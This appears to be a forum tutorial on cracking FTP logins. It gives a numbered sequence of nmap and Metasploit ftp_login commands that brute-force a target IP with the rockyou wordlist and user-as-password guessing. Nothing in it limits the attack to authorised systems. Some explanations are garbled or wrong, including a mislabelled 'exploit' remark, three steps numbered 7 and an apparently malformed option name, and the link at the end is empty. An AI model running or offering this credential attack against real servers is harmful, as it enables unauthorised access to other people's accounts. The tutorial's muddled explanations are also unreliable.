02-10-2020, 07:02 AM
| 0 | 0 | ||
In this tutorial i'm going to show you how to crack Ftp login page low and medium security
Operations System: Parrot OS
Commands that use inside Tutorial:
1- ping "url"
2-nmap -p 21 "ip"
3-msfconsole
4-use auxiliary/scanner/ftp/ftp_login -------------- use --exploit mean this kind of attack
5-set RHOST "ip" ----------- RHOST mean Target
6-set USER_FILE /root/Desktop/rockyou.txt --------- user_file mean username and i pick rockyou because best word list you can find it by search on name inside main folder(root)
7-set USER_AS_PASS true ---------- here you can use multi choices user as pass mean if username: Admin so make password also Admin
other commands for
7-set PASS_FILE /root/Desktop/rockyou.txt
7- set USER_PASS /root/Desktop/rockyou.txt
you can read good "options" and control your commands
link:














